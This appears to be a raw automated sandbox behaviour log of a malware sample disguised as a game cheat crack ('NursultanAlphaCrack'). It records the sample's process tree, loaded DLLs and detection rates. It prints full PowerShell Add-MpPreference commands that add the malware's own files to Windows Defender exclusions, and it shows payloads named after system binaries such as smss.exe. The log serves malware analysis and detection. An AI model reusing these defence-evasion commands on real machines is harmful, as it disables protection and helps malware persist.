                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files\Windows NT\smss.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: NursultanAlphaCrack.bat.exeVirustotal: Detection: 72%
                                    Source: NursultanAlphaCrack.bat.exeReversingLabs: Detection: 63%
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeFile read: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe "C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe"
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portsurrogateFontCrt\mhHwHj5jfnxhi.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portsurrogateFontCrt\BlockcontainerWin.exe "C:\portsurrogateFontCrt/BlockcontainerWin.exe"
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe'
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portsurrogateFontCrt\BlockcontainerWin.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\portsurrogateFontCrt\BlockcontainerWin.exe C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                    Source: unknownProcess created: C:\portsurrogateFontCrt\BlockcontainerWin.exe C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                    Source: unknownProcess created: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows NT\smss.exe "C:\Program Files\Windows NT\smss.exe"
                                    Source: C:\Program Files\Windows NT\smss.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows NT\smss.exe "C:\Program Files\Windows NT\smss.exe"
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portsurrogateFontCrt\mhHwHj5jfnxhi.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portsurrogateFontCrt\BlockcontainerWin.exe "C:\portsurrogateFontCrt/BlockcontainerWin.exe"Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portsurrogateFontCrt\BlockcontainerWin.exe'Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat" Jump to behavior
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows NT\smss.exe "C:\Program Files\Windows NT\smss.exe"
                                    Source: C:\Program Files\Windows NT\smss.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows NT\smss.exe "C:\Program Files\Windows NT\smss.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: version.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
